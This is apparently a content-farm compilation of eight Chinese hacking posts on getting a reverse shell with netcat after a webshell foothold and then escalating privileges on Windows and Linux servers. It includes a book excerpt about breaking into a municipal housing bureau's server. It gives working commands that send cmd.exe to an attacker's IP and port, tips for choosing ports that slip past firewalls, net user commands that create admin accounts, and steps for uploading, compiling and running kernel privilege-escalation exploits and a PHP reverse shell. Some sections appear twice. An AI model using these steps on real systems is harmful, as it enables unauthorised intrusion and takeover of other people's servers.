NC反弹CMDSHELL提权总结

时间:2022-12-15 07:45:54 其他总结 收藏本文 下载本文

NC反弹CMDSHELL提权总结(整理8篇)由网友“小奶油”投稿提供,以下是小编为大家整理后的NC反弹CMDSHELL提权总结,欢迎阅读与收藏。

NC反弹CMDSHELL提权总结

篇1:NC反弹CMDSHELL提权总结

Server-U等都不可以用的情况下.  一般都可思考用此方法

不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…  那么这种方法也失效了….

1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)

web目录都是有写有读的权限,我们直接传NC进去

2:然后本地执行nc -vv -lp 52进行反弹

3:在shell命令下执行

F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)

4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.

5:直接添加用户,然后远程去连接!

看到添加成功,也设置为管理组了!接下来直接远程连接就OK!

不少人NC提权没有成功过,因为其中的原因是你没有降低权限,而导致了NC提权失败

失败总结:

1.反弹端口

网上不少文章写 反弹端口445 110 什么的,你当防火墙白痴是不是,我建议看一下端口有没有8080端口,如果没有8080端口的话,要反弹8080

端口,这样被防火墙阻止的概率较小

2.降低运行权限

1.现在本地监听一个端口

nc -vv -l -p 8080 //最好是80或8080这样的端口,被防火墙拦截的几率很小,

NC反弹CMDSHELL提权总结

2.在WebShell运行下面命令连接我们监听的端口得到CmdShell:

nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe //假设cmd.exe是上传在“C:\Documents and Settings\All

Users\Documents\”这个目录

篇2:NC反弹CMD提权

By:Falling

上次拿的服务器很久没看了,

这几天忙与学习。

今天上去看下

帐号被删除。。我擦。

这个管理员真是让人 .

于是用用上次方法udf提权。

帐号还是没添加上。。

如图:

经过很多测试不成功。管理员但还是疏忽了ws组建。

呵呵。成功的希望正在前方。。

虽然对mysql语句不精通。

放弃了mysql提权方法。

后来在某个论坛看见cmd反弹shell

呵呵,

有戏了。

灵感来了。找了web目录上传nc和巴西烤肉

web目录都是有写有读的权限。

本机连接

nc -vv -lp 52

服务器连接比如:

D:\web\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)

如图:

反弹上去net user 成功了.

利用巴西烤肉来提权

命令:

1.exe user falling falling /add

就出现了密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历

史的要求。

如图:

那就换个密码吧.

net user falling Falling1234 /add

果断的成功

如图:

篇3:Windows下NC反弹CMD提权

Server-U等都不可以用的情况下.  一般都可思考用此方法

不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…  那么这种方法也失效了….

1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)

web目录都是有写有读的权限,我们直接传NC进去

2:然后本地执行nc -vv -lp 52进行反弹

3:在shell命令下执行

F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)

4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.

5:直接添加用户,然后远程去连接!

看到添加成功,也设置为管理组了!接下来直接远程连接就OK!​

篇4:Linux下使用NC反弹本地简单的提权

很多时候拿到shell了,然后在菜道或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!

先看下linux内核

uanme -a

2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!

找个外网IP 监听12666,当然12666也可以改,我这里用NC监听nc -l -n -v -p 12666

然后再点你shell

连接成功就出现下面的内容

然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限是可写可执行!

然后我们进到/tmp目录

cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194

我这里有权限rwx,可读可写可执行.如果没有权限执行命令chmod -R 777 文件名

我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译那么先执行gcc /tmp/文件名.c -o /tmp/文件名

命令先把他编译好,在执行./2.6.18-194运行EXP就OK了!

​​

篇5:NC在提权过程中的使用

话说n天前拿到了一个webshell 、因为空间是美国的、我个人比较感兴趣哈、

因此就想办法看看能不能把权限给提升了、

故事就讲到这里、因为不是重点、

重点:使用NC得到系统cmdshell

工具:点击下载

步骤: 1、本地监听一个端口,

NC在提权过程中的使用

nc -vv -l -p 8080

最好是80或8080这样的端口,被防火墙拦截的几率小很多。

2、在WebShell运行下面命令连接我们监听的端口得到CmdShell:

nc -vv 步骤1监听的地址 8080 -e 上传的cmd.exe

By:Coody

篇6:虚拟主机提权简单总结

我们的分享和交流只是为了能让自己进步一点点,能带给基友们一点点帮助,可是在交流的过程中遇见了能提权的shell被人删除的情况,真想不通陌生的基友你为什么要这样自私呢,做个黑产拿几百个shell回去卖,你能富有吗?

第一:了解一些简单的虚拟主机识别

常见的虚拟主机识别:

星外虚拟主机主机D:\freehost\zhoudeyang\web\Prim@Hosting 一般很难找到可执行目录,可以测试用远程调用cmd,exp来提权

虚拟主机D:\hosting\wwwroot\ vhostroot

分支D:\Vhost\WebRoot\51dancecn\ vhostrootD:\vhostroot\localuser\

星外分支D:\vhostroot\LocalUser\gdrt\

新网虚拟主机D:\virtualhost\web580651\www\  可以找到很多可执行目录,但是目前基本上大部分为windows 系统,提权有难度

华众虚拟主机E:\wwwroot\longzhihu\wwwroot\  一般有安全模式

星外分支F:\host\wz8088\web\

万网虚拟主机F:\usr\fw04408\xpinfo\  支持aspx的话应该能扫到可执行目录

其他的虚拟主机可以使用reg.aspx,getacl.aspx配合来识别

第二:是不是能找到可执行目录

主要asp.php和aspx的,我在这里主要介绍ASPX的:

Reg.aspx从注册表读取目录

Getacl.aspx遍历目录以及文件,获取当前用户可控制的目录或者文件

篇7:四川某市房管局网站服务器内部网络入侵纪实反弹Shell,Linux溢出提权。

摘要:《大中型网络入侵要案直击与防御》本章介绍的是开篇案例--四川某市房管局网站服务器内部网络入侵纪实,本节为大家介绍反弹Shell,Linux溢出提权。

21.2.6 反弹Shell,Linux溢出提权

mysql提权失败,转换入侵思路,可以考虑溢出提权,这也是在WebShell中常见的一种提权方式。不过在进行溢出提权时,用WebShell中的shell命令直接操作是无法获得提权后的CMD Shell的,因此必须先利用WebShell反弹到本地,建立一个CMD Shell窗口,在其中进行提权操作。

还是利用刚才的FTP账号上传一个PHP反弹shell工具,上传前修改设置其中的反弹IP地址为本机IP地址,端口为8888,上传后的链接地址为“www.**114.com/ zt/shell.php”。然后在本地打开命令提示符窗口,执行如下命令。

nc -l -vv -p 8888

使用nc监听本地的8888端口,

在浏览器中访问“www.**114.com/zt/shell.php”,在nc监听的端口中,就可以获得一个从网站服务器(125.70.244.104)上返回来的命令行Shell了(图21-26)。

获得一个Shell,就可以稳定地进行操作,不会出现像在WebShell中操作时超时或无法连接的情况。现在考虑进行溢出提权。

截止到入侵的当前时间7月为止,最新的Linux溢出提权漏洞有以下几个。

Linux Kernel 2.6.x UDEV Local Privilege Escalation ExploitLinux Kernel 2.6.x SCTP FWD Memory COrruption Remote ExploitLinux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

[1] [2] [3]  下一页

篇8:四川某市房管局网站服务器内部网络入侵纪实反弹Shell,Linux溢出提权。网站安全

摘要:《大中型网络入侵要案直击与防御》本章介绍的是开篇案例--四川某市房管局网站服务器内部网络入侵纪实,本节为大家介绍反弹Shell,Linux溢出提权。

21.2.6 反弹Shell,Linux溢出提权

mysql提权失败,转换入侵思路,可以考虑溢出提权,这也是在WebShell中常见的一种提权方式。不过在进行溢出提权时,用WebShell中的shell命令直接操作是无法获得提权后的CMD Shell的,因此必须先利用WebShell反弹到本地,建立一个CMD Shell窗口,在其中进行提权操作。

还是利用刚才的FTP账号上传一个PHP反弹shell工具,上传前修改设置其中的反弹IP地址为本机IP地址,端口为8888,上传后的链接地址为“www.**114.com/ zt/shell.php”。然后在本地打开命令提示符窗口,执行如下命令。

nc -l -vv -p 8888

使用nc监听本地的8888端口。在浏览器中访问“www.**114.com/zt/shell.php”,在nc监听的端口中,就可以获得一个从网站服务器(125.70.244.104)上返回来的命令行Shell了(图21-26)。

获得一个Shell,就可以稳定地进行操作,不会出现像在WebShell中操作时超时或无法连接的情况。现在考虑进行溢出提权。

截止到入侵的当前时间2009年7月为止,最新的Linux溢出提权漏洞有以下几个。

Linux Kernel 2.6.x UDEV Local Privilege Escalation ExploitLinux Kernel 2.6.x SCTP FWD Memory COrruption Remote ExploitLinux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

其中第二个漏洞要求目标系统上至少运行了一个SCTP协议的程序,

SCTP不是一个常用的协议,但在电信网络骨干里会经常见到它,多个Linux发行版默认也不启用SCTP支持,多是以LKM的形式存在的。要利用这个漏洞就必须满足两个条件:系统默认支持SCTP或者加载sctp LKM,系统有一个SCTP用户空间程序监听某个sctp端口。而通过查看端口发现,目标系统中未运行SCTP协议,因此无法利用其进行攻击。只有考虑利用UDEV和ptrace_attach本地提权漏洞攻击。

先尝试最新的Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit漏洞,这个溢出漏洞利用程序有两个版本,一个是s0m3b0dy,另一个是prdelka版本,两个都是用C语言写的。先将s0m3b0dy版代码文件“s0m3b0dy.c”通过FTP上传,或者直接在返回的Shell窗口中用Wget命令下载到目标主机上。然后在Shell中执行如下命令进行编译。

gcc -o s0m3b0dy s0m3b0dy.c

编译成功生成溢出程序,执行如下命令。

./linux

执行编译程序进行溢出,但是在溢出时提示“Damn no r00t here:(”,看来溢出失败,提权不成功(图21-27)。

图21-26 监听本地端口图21-27 溢出失败

再传prdelka版溢出代码“prdelka.c”并进行编译,在编译时出现错误,执行编译程序后无任何反应。

再尝试用Linux Kernel 2.6.x UDEV Local Privilege Escalation Exploit进行溢出提权攻击,也未提权成功。

linux当mysql以root权限登录时提权网站安全

FTP常用软件servu的安全权限处理WEB安全

伪科学:Mysql system函数提权

SA权限九种上传文件办法

教你做服务级的木马后门

Windows 服务器的安全防护林

手工打造寿山石励志句子

3389新思路 SQL渗透的一些技术

网站渗透思路全方面总结

财务软件实施维护工程师简历表格

NC反弹CMDSHELL提权总结
《NC反弹CMDSHELL提权总结.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【NC反弹CMDSHELL提权总结(整理8篇)】相关文章:

浅析进程“伪隐藏”技术与实现两则2022-09-10

如何入侵XP(xp入侵教程)2024-03-04

售前工程师求职简历表格2024-04-21

Oracle SQL Injection Cheat Sheet脚本安全2023-02-16

让脚本躲过杀毒软件脚本安全2023-08-31

NFS服务器安全的解析和解决2024-04-10

Discuz XSS得webshell脚本安全2022-05-08

一次意外突破安全狗拿Shell2023-03-26

如何防范网站数据库入侵2022-11-30

Echo 写入VBS提权2022-07-19

点击下载本文文档